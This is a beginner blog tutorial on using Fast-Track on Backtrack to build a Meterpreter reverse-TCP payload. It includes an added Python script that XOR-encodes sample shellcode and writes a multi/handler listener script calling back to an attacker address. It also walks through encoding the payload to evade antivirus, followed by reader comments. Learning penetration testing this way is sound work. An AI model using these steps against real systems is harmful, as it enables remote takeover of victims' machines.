In an earlier post we discussed the Metasploit Framework; in this tutorial we look at Fast-Track, which, as we will see, is considerably easier to use than Metasploit. Specifically, we will generate a payload from Fast-Track's menu-driven interface.
What is Fast-Track?
Fast-Track is an open-source Python project, the brainchild of David Kennedy, written to help during penetration tests by automating common tasks on top of the Metasploit Framework. It makes it easy for pen testers to exploit client-side weaknesses, poor patch management and so on. It depends on Metasploit, SQLite, FreeTDS and a few other packages. Its main advantage over using Metasploit directly is its very user-friendly, menu-driven interface.
What is Payload?
The payload is the code an exploit delivers and runs on the target once the vulnerability has been triggered; in other words, it is what the exploit actually does for you. For example, after running an exploit against a target box, the payload is what gives us a command shell, a VNC desktop or access to the file system, with the session coming back to the attacker box.
What is Shellcode?
Shellcode is the raw machine code (the opcodes) that a payload consists of; it is injected into a process on the target box and executed there, typically to obtain a command shell. It can be encoded so that its byte pattern no longer matches antivirus signatures written for the unencoded version, although the decoder stub and the code's behaviour at run time remain visible to antivirus.
Requirements:
1. Backtrack
2. Virtual environment software (VMware Player/VirtualBox)
Learn how to boot Backtrack from USB
Learn how to use a virtual environment
Procedure:
Step 1.
Boot Backtrack, open a shell console and change into the Fast-Track directory under /pentest/exploits (on Backtrack 4 this is "cd /pentest/exploits/fasttrack"). Then
type "python setup.py install" to check whether Fast-Track has all of its dependencies installed; anything that is missing is downloaded from the Internet, as shown below.
Step 2.
Now run "python fast-track.py" with no arguments to see the available modes and pick the one you want. Here I have selected the menu-driven interactive mode ("./fast-track.py -i"), since that is the mode this tutorial uses.
Step 3.
The Fast-Track main menu now appears on screen; I selected no. 6, "Payload Generator", as shown in the image below.
Step 4.
Next we choose the type of payload from the menu; here I selected no. 2, "Reverse_Tcp Meterpreter", as shown in the image below. A reverse TCP payload makes the target connect back to the attacker's machine, so no inbound port has to be reachable on the target.
Step 5.
Next we are asked which encoder to apply to the payload in order to bypass AV; here we selected no. 2, as shown in the image below. Keep in mind that encoding only rewrites the payload bytes so that a signature for the unencoded stager no longer matches; the decoder stub and the payload's behaviour stay the same, so it should not be relied on to bypass up-to-date antivirus.
Step 6.
Now enter the host IP address and port the payload should connect back to, i.e. the attacker's (listener's) IP address and listening port. Then select the form of the payload, "executable" or "shellcode", as shown in the image below.
Step 7.
As you can see, the payload was saved as a .txt file, from which we can take the shellcode. Had we chosen the "executable" format, a .exe file would have been created instead.
Step 8.
If the .exe file is run on the victim's box while a listener (Metasploit's exploit/multi/handler, configured with the same payload, LHOST and LPORT that we entered in Step 6) is waiting on our box, we get a Meterpreter session on our desktop, as shown in the image below.
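The eight steps above leave you with a shellcode .txt (or a .exe) and the need for a matching listener. The Python below is an added example, not code from the original post or from Fast-Track itself. It parses the saved shellcode (assuming, as msfpayload's C output does, that the file lists the bytes as \xNN escapes), checks it for bytes that break common injection paths, applies a toy single-byte XOR encoder to show what "encoding" in Step 5 actually changes (the real encoders Fast-Track drives through msfencode are more elaborate, but the principle is the same), and writes out the exploit/multi/handler resource script for the listener in Step 8. The sample shellcode fragment, the address 192.168.1.5 and port 4444 are constructed placeholders.

```python
import re

# Constructed sample in the C-style "\xNN" form that msfpayload's C output
# uses (assumption: Fast-Track's saved .txt uses the same form). This is a
# short fragment for illustration, not a complete working stager.
SAMPLE_SHELLCODE_TXT = r'''
unsigned char buf[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff";
'''

HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")

# Bytes that commonly truncate or corrupt the buffer when shellcode passes
# through a string-handling path on the way into memory (NUL, LF, CR).
DEFAULT_BAD_CHARS = b"\x00\x0a\x0d"


def parse_shellcode(text):
    """Return the raw bytes written as \\xNN escapes in a C-style listing."""
    return bytes(int(h, 16) for h in HEX_ESCAPE.findall(text))


def find_bad_chars(code, bad=DEFAULT_BAD_CHARS):
    """Offsets of every byte in `code` that appears in `bad`."""
    return [i for i, b in enumerate(code) if b in bad]


def xor_encode(code, key):
    """Single-byte XOR; applying it twice with the same key restores the input."""
    return bytes(b ^ key for b in code)


def pick_xor_key(code, bad=DEFAULT_BAD_CHARS):
    """First non-zero key whose output contains no bad byte, or None.

    The key itself must not be a bad byte either, because the decoder stub
    that undoes the XOR on the target has to carry it.
    """
    for key in range(1, 256):
        if key not in bad and not find_bad_chars(xor_encode(code, key), bad):
            return key
    return None


def to_c_array(code, name="buf"):
    """Write bytes back out in the same \\xNN listing form, 15 bytes per line."""
    lines = ['"' + "".join("\\x%02x" % b for b in code[i:i + 15]) + '"'
             for i in range(0, len(code), 15)]
    return "unsigned char %s[] =\n%s;\n" % (name, "\n".join(lines))


def handler_rc(lhost, lport, payload="windows/meterpreter/reverse_tcp"):
    """msfconsole resource script for the listener a reverse payload calls back to.

    LHOST/LPORT must be the values typed into Fast-Track in Step 6.
    """
    return "\n".join([
        "use exploit/multi/handler",
        "set PAYLOAD %s" % payload,
        "set LHOST %s" % lhost,
        "set LPORT %d" % lport,
        "exploit -j -z",
    ]) + "\n"


if __name__ == "__main__":
    code = parse_shellcode(SAMPLE_SHELLCODE_TXT)
    print("parsed %d bytes, bad chars at offsets %s" % (len(code), find_bad_chars(code)))
    key = pick_xor_key(code)
    encoded = xor_encode(code, key)
    print("xor key 0x%02x, encoded bad chars at %s" % (key, find_bad_chars(encoded)))
    print(to_c_array(encoded))
    # 192.168.1.5:4444 stands in for the attacker address entered in Step 6.
    with open("handler.rc", "w") as f:
        f.write(handler_rc("192.168.1.5", 4444))
```

Run it with python, then start the listener with "msfconsole -r handler.rc" before the .exe is executed on the target. The encoded bytes differ completely from the originals, which is why a static signature written for the raw stager misses them; but the decoder stub that has to be prepended to undo the XOR is itself a fixed pattern, and the payload behaves identically once it runs, which is why the encoding in Step 5 does not reliably defeat current antivirus.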
In the next post we will see how to turn the generated shellcode into an executable.
If you find this post useful then do drop a comment; it will be appreciated... :)
Fast-Track Tutorial for Beginners | Payload Generation
Reviewed by Satyajit (Admins, a.k.a. Satosys) on Friday, January 28, 2011
25 comments:
Very good work yar. Keep it up :)
@Aneesh Thanks for the comment :) Keep visiting.
keep up the good work!
Very clear tutorial. Thanks for sharing this tutorial. I am waiting for your other posts :)
Good post it is good i like your blog
This tutorial was very enlightening for me, thanks!
I think it is a useful post for beginners in this program, but not only, it can remind basic things even to those who have some experience already. Good work.
Thank You for the Post.It is very useful for me.I was looking for this kind of post.
This tutorial is very impressive..very informative to me..thank you very much
Dude, your posts are fine and simple ....better than prohack....but lack content.
Please try to include more ...content....thanks for this
Hats off to the one who made Backtrack. I am not familiar with this, but I can hack a WEP key with Backtrack just from the commands I have noted.
Excellent review. Thanks for sharing mate!
Nice post. I worked with Fast-Track for my senior design project, had a lot of fun with it
very good work.Thanks
Thanks for sharing, I'll use it for my site.
Its awesome must give a try thanks for giving a great tutorial
Nice and great article! Im looking forward to read more of your article…Good job.
@Praneesh Thanks for your appreciation.... Prohack is a good site too. :)
Yes, I will surely come up with interesting content soon.
Keep visiting... :)
Wow! This is super exciting and fun.
Thank you so much for this tutorial.. I can't wait to read more hacking tips and tricks in the coming weeks. :D
Excellent info once again. Thumbs up.
Very interesting topics here in your site mate. Can't wait to read more of your blogs. Just keep it coming.
I'm glad that I stumble upon your site. I'll keep reading. Thank you.
Good
I found this site very informative
Thank you
Great article,
you live and learn.
Thanks
Deon